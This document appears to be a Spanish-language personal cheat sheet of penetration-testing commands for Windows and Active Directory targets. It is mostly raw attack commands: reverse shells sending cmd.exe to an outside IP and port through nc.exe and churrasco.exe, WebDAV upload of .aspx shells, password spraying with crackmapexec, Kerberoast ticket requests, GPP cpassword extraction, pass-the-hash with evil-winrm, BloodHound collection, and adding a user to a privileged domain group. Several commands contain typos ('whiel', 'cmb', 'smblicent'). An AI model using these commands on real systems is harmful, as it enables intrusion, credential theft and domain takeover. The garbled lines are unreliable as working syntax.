Herramientas

¡¡¡Trabajando en este apartado!!!

First Tab

Second Tab

Transferir Archivos Windows

SeImpersonatePrivilege

Compartimos por smbFolder

smbserver.py (-smb2support) share . copy \10.10.16.8\share\<> APP

Ejecución del churrasco con nc.exe .\churrasco.exe -d "C:\PATH\nc.exe -e cmd.exe IP PORT"

.\churrasco.exe -d "C:\Windows\System32\cmd.exe"

impacket-smbserver smbFolder $(pwd) -smb2support copy \IP\Folder\APP APP

Subida De Archivos Web IIS

(Sudo)

davtest -url http://IP

CADAVER

Cadaver -> put archivo -> MOVE archivo archivo.aspx start /b \IP\share.exe -e cmd IP PORT

certutil

CRACKMAPEXEC

cmb smb IP -u dict.txt -p dict.txt 
cme winrm IP -u 'USER' -p 'PASS' 
cmb smb IP -u 'USER' -p 'PASS' --shares

findstr password

SSH PORT FORWARDING

ssh -L PORT:LOCALHOST:PORT USER@IP

scp APP USER@IP:PATH

MONTURA FTP

mkdir /mnt/ftp curlftpfs user:pass@IP /PATH/

mount -t cifs //0.0.0.0/Users /mnt/smbmounted -o username=USER,password=PASS,domain=domain,rw

smbclient
    smbclient -L 0.0.0.0 -N
    smblicent //IP/Replication -N
smbmap : Nos lista los permisos
    smbmap -H 0.0.0.0 -R Replication -A Groups.xml
    smbmap -d active.htb -u 'USER' -p 'PASS' -H 0.0.0.0 -R Users -A user.txt -q
rpcclient -U "" 0.0.0.0

smbcacls //0.0.0.0/Replication domain -U 'USER%PASS'

rpcclient -U 'USER%PASS' 0.0.0.0 -c "enumdomusers"
rpcclient -U 'USER%PASS' 0.0.0.0 -c "querygroupmem 0x200" | awk '{print $1}' | grep -oP '\[.*?\]' | tr -d "[]"

rpcclient -U 'USER%PASS' 0.0.0.0 -c "querygroupmem 0x200" | awk '{print $1}' | grep -oP '\[.*?\]' | tr -d "[]" | whiel read rid; do rpcclient -U 'USER%PASS' 0.0.0.0 -c "queryuser $rid"; done

rpcclient -U 'USER%PASS' 0.0.0.0 -c "querygroupmem 0x200" | awk '{print $1}' | grep -oP '\[.*?\]' | tr -d "[]" | whiel read rid; do rpcclient -U 'USER%PASS' 0.0.0.0 -c "queryuser $rid" | grep "User Name" | awk 'NF{print $NF}'; done

rpcclient -U 'USER%PASS' 0.0.0.0 -c "querygroupmem 0x200" | awk '{print $1}' | grep -oP '\[.*?\]' | tr -d "[]" | whiel read rid; do echo "$rid: $(rpcclient -U 'USER%PASS' 0.0.0.0 -c "queryuser $rid" | grep "User Name" | awk 'NF{print $NF}')"; done

grep -o 'cpassword="+"'

GetADUsers.py -all domain/user:pass -dc-ip 0.0.0.0 
GetUserSPNs.py domain/user:pass -dc-ip 0.0.0.0 -request -output tgs.hash
(rdate -n 0.0.0.0)

PSEXEC

psexec domain/USER:PASS@0.0.0.0

LDAPDOMAINDUMP

ldapdomaindump -u 'USER' -p 'PASS' IP

EVIL-WINRM

evil-winrm -i IP -u 'USER' -p 'PASS'
evil-winrm -i IP -u 'USER' -H 'HASH'

NEO4J

neo4j console : neo4j:Password
bloodhound

Sharpblound.ps1 
    Import-Module .\SharpHound.ps1
    Invoke-BloodHound -CollectionMethod All

net user ale ale123! /add /domain
net user
net group "Exchange Windows Permissions" ale /add